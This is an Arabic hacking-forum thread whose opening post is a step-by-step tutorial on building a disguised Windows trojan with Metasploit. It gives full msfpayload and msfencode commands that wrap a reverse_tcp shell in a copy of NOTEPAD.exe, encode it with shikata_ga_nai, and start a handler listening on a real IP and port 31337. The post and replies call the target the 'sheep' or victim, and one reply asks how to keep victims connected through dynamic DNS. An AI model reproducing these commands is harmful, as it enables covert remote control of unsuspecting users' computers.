تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي


صفحة 1 من 4 123 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 32

الموضوع: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

  1. #1
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    Hasri تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي



    تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم إن شاء الله راح نتناول موضوع جديد ولم يسبق وأن طرح يعني جميع الحقوق محفوظة لمنتديات جيوش الهكرز ....


    مثل ماذكرنا لاحقا راح نقوم بتكوين ملف عبارة عن سيرفر وسوف نقوم بتشفيرة ومن ثم تجربة التبليغ ، تم تطبيق النظرية ببرنامج metasploit الإصدار رقم 3-3 لنتابع الشرح من خلال الصور


    راح نستخدم أداة cygwin shell المرفقة مع البرنامج ونقوم بالوصول اليها وفتحها كما هو موضح في الصورة التالية:



    بعد مانفتح الأداة نكتب الأمر التالي لمعاينة خيارات البايلودات المتاحة :


    [hide]
    كود:
    msfpayload -h
    [/hide]

    وسيتم تحديد استخدام البايلود المتاح كما في الصورة التالية :



    [hide]

    [/hide]
    بعد ذلك سنقوم باستعراض الأوامر المساعدة لأمر التشفير من خلال كتابتنا للكود التالي :


    كود:
    msfencode -h
    وسوف تظهر لنا الأوامر المساعدة كما هو موضوح بالصورة التالية :




    من خلال ماسبق سنقوم باستعراض قائمة التشفير المتاحة لإستخدام أفضلها ، ونقوم بكتابة الأمر التالي لعرض القائمة :


    كود:
    msfencode -l
    وبموجب الأمر السابق سيتم ظهور قائمة بالتشفير سيتم استخدامنا لكود التشفير المحدد برقم 2 كما في الصورة التالية :




    الأن حددنا نقطتين سيتم استخادمها وبقي لنا نقطة وهي معرفة خيارات module للأوامر المساعدة للأكسبلويت ، ونقوم باستعراضها من خلال الأمر التالي :


    كود:
    msfcli -h
    وبموجب ذلك سوف تظهر لنا الأوامر المساعدة لعرض الخيارات كما بالصورة التالية :




    سنقوم باستخدام الأمر s مع البايلود الذي حددناه في أول خطوة لعرض الخيارات ويهمنا فيها خيارات التبليغ ، ونطبق ذلك من خلال الأمر التالي :


    كود:
    msfpayload windows/shell/reverse_tcp s
    من خلال الأمر السابق سوف تظهر لنا خيارات كما في الصورة التالية :





    حلو الأن عرفنا كافة المعلومات إلي راح نحتاجها وبقي لنا قبل التطبيق ، أن نقوم بتوفير أي برنامج لنحوله إلى سيرفر ، أنا أخترت برنامج المفكرة تبع الويندوز ( notepad ) وسوف نقوم بتوفيرها من خلال نسخها من مجلد windows الموجود بالقرص سي ولصقها داخل مجلد ( black ) في برنامج الميتاسبلويت طبعا اسم المجلد عندي بلاك يعني بحسب المستخدم ، الصور التالية ستوضح لكم الفكرة بشكل ممتاز ، لنتابع







    الأن نجي لأمر تطبيق النقاط السابقة بشكل كامل ، بمعنى تحديد بايلود التبليغ وكود التشفير والأي بي تبعنا او الهوست لإستقبال الإتصال بالإضافة إلى تحديد المنفذ ، ويتم كل ذلك من خلال كتابتنا للأمر التالي :


    [hide]
    كود:
    msfpayload windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 R | msfencode -x NOTEPAD.exe -t exe -e x86/shikata_ga_nai -o reverseNOTEPAD.exe
    [/hide]
    مثل ماتشوفوا حددنا كافة الخيارات بالإضافة إلى صيفة الملف الناتج وهو تنفيذي ، والصورة التالية توضح تنفيذنا للأمر




    وحتى نتأكد من أنه تم تنفيذ الأمر نذهب لمجلد المستخدم داخل مجلدات برنامج الميتا في نفس المكان الذي لصقنا فيه المفكرة وفي حالة نجاح الأمر بإذن الله سوف تظهر لنا النتيجة كما بالصورة التالية




    مثل ماشفنا العملية نجحت والحمد لله وأصبح لدينا مفكرتين وحدة تبع الوبندوز الأصل والأخرى نحن قمنا بتكوينها ، وفيما يلي صورة توضح المقارنة بين المفكرتين وهي تدل على أن النسخة الذي قمنا بتكوينها مطابقة للنسخة الأصلية ....




    ياسلام شغل نظيف جدا ، الأن نقوم وقبل تجريب التبليغ نقوم بكتابة الكود التالي لتشغيل الأكسبلويت :


    [hide]
    كود:
    msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 E
    [/hide]
    إذا كانت خطواتنا صح سوف يظهر لنا قبول التنفيذ كما في الصورة التالية :


    [hide]
    [/hide]

    ياسلام تم تشغيل الإكسبلويت ، الأن الأكسبلويت بانتظار التبليغ ، وكيف يجي التبليغ ؟؟؟ طبعا يجي اذا قمنا بفتح السيرفر الذي قمنا بتكوينه وهو المفكرة المزورة ، والصورتين التالية توضح ماذا يحدث عند فتح السيرفر ووصول التبليغ وعملية التطبيق




    الصورة السابقة توضح تطبيق الأكسبلويت وظهور التبليغ والمنفذ المفتوح ومن ثم ظهور نافذة دوس الخروف وبالتالي امكانية تطبيقنا لكافة اوامر الدوس على جهاز الخروف ..



    نسأل الله أن نكون قد وفقنا بشرح الموضوع ، وأذكر بأن جميع الحقوق محفوظة لمنتديات جيوش الهكرز ، وإلى لقاء أخر إن شاء الله في موضوع حصري جديد


    ودمتم سالمين
    التعديل الأخير تم بواسطة BLACK.JaGuAr ; 02-26-2010 الساعة 07:06 PM

    I love Yemen




  2. #2

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    شرف لي أن اكون اول من يرد على هذا الموضوع المميز والحصري ,,,,دائما تبهرنا بمواضيعك الرااائعه

    والتي لها الاثر الملموس في رقي هذا الصرح الشامخ ,,,,,,

    دمت في تألق وابداع ,,,,


    إن المحبة الصادقة كعلاقة اليد بالعين إذا تألمت اليد دمعت العين وإذا دمعت العين مسحتها اليد

  3. #3

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    مشكوووووور والله يعطيك الف عافيه

  4. #4

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    مشكوووور على هذا الموضوع الرائع
    واتمنى منك ان تستمر على هذا المنوال

  5. #5

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    مشكووووور اخي بلاك

  6. #6

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    موضوع في قمة الروعة
    الله عليك يا إبن اليمن

    مبدع كما عودتنا جميعا

    إلى الأمام

    تحياتي لك...
    فيديو اليوم


    اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له .

    سجل إختراقك الأن في Aljyyosh.org بمميزات عديده



    من مواضيعي:


    سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ

  7. #7

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    شكرا يا بيه ع الشرح ،، و سؤالين لو سمحت ...

    -------- الأول --------
    أول حاجه في تكوين ال PayLoad كان ال LHOST = 89.189.94.49
    و مع ذلك ال session مفتوحه علي جهاز أخر (89.189.95.20) هو Attacker و ال Victim في نفس الوقت... السبب إيه ؟؟؟؟
    ----------------------

    -------- الثاني --------
    إستشارة قانونيه يا كبير : هل ينفع نستخدم ال no-ip أو أي طريقه لعمل PayLoad يتصل بالإسم بدل ال IP ... يعني مثلا:
    بدل ما نكون ال PayLoad بالطريقه دي:
    ..... PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 ......
    نكتبها كده:
    .... PAYLOAD=windows/shell/reverse_tcp LHOST=example.no-ip.biz LPORT=31337 ......
    و لو ما ينفعش ، هل فيه وسيله أخري .. الغرض هو إني أضمن ثبات الضحيه في حالة إذا ما تغير ال IP بتاعي (علي أساس إني الهاكر !!)
    ------------------------

    منتظر ردك ، و تسلم إيدك ع الشرح الجميل ....

    بقول لك إيه :p
    إنت بتستخدم برنامج إيه في تصوير الشاشه ... ؟؟؟ اللي بيعمل الأسهم و الترقيمات دي ؟؟؟؟؟

  8. #8
    :: مشرف عام :: Aljyyosh Team الصورة الرمزية BLACK.JaGuAr
    تاريخ التسجيل
    Jun 2009
    الدولة
    أصل العرب
    المشاركات
    2,299

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    اقتباس المشاركة الأصلية كتبت بواسطة New0h مشاهدة المشاركة
    شكرا يا بيه ع الشرح ،، و سؤالين لو سمحت ...

    -------- الأول --------
    أول حاجه في تكوين ال PayLoad كان ال LHOST = 89.189.94.49
    و مع ذلك ال session مفتوحه علي جهاز أخر (89.189.95.20) هو Attacker و ال Victim في نفس الوقت... السبب إيه ؟؟؟؟
    ----------------------
    بالنسبة جا بسبب اني كملت الشرح ثاني يوم وكان الاي بي وقتها تغير المهم في هذة النقطة هو الهوست ، حتى وان كان تبع النو اي بي
    -------- الثاني --------
    إستشارة قانونيه يا كبير : هل ينفع نستخدم ال no-ip أو أي طريقه لعمل PayLoad يتصل بالإسم بدل ال IP ... يعني مثلا:
    بدل ما نكون ال PayLoad بالطريقه دي:
    ..... PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 ......
    نكتبها كده:
    .... PAYLOAD=windows/shell/reverse_tcp LHOST=example.no-ip.biz LPORT=31337 ......
    و لو ما ينفعش ، هل فيه وسيله أخري .. الغرض هو إني أضمن ثبات الضحيه في حالة إذا ما تغير ال IP بتاعي (علي أساس إني الهاكر !!)
    ------------------------

    منتظر ردك ، و تسلم إيدك ع الشرح الجميل ....

    بقول لك إيه :p
    إنت بتستخدم برنامج إيه في تصوير الشاشه ... ؟؟؟ اللي بيعمل الأسهم و الترقيمات دي ؟؟؟؟؟
    برنامج SnagIt 9

    I love Yemen




  9. #9

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    ألف شكر علي الرد و الإهتماااام ...
    بس إنت ما رديتش علي سؤالي التاني :: بخصوص النو آي بي مع تكوين الباي لوود ؟؟؟؟؟؟
    أو طريقه لتثبيت الضحايا لما أنفذ الإختراق علي جهاز في شبكة خارجيه (wan) ... منتظرك يا زعيم

  10. #10

    افتراضي رد: تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي

    اخوي الصور ما تظهر ممكن لو تعيد ارفاق الصور لو سمحت

صفحة 1 من 4 123 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. إستغلال التشفير الى دمج وتشفير :$
    بواسطة Moon Dark في المنتدى قسم اختراق الأجهزة
    مشاركات: 4
    آخر مشاركة: 07-23-2012, 03:36 AM
  2. شرح الإتصال بالقاعدة وأخذ نسخ للقاعدة من الشيل
    بواسطة ASDELY-ScOrPiOn في المنتدى منتدى الإختراق العام
    مشاركات: 12
    آخر مشاركة: 01-30-2012, 05:20 AM
  3. فديو اختراق,تشفير,دمج ,تخطي حمايه vga internet security بالميتا اسبوليت
    بواسطة الصخره في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 18
    آخر مشاركة: 11-24-2011, 05:34 PM
  4. شرح تكوين سيرفر Cerberus مع طريقة تشفيرة من الحمايات
    بواسطة She!! Access في المنتدى قسم اختراق الأجهزة
    مشاركات: 11
    آخر مشاركة: 05-17-2011, 10:50 PM
  5. منقول:تكوين سيرفر البيفروست
    بواسطة r00t في المنتدى قسم اختراق الأجهزة
    مشاركات: 1
    آخر مشاركة: 05-25-2010, 11:47 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •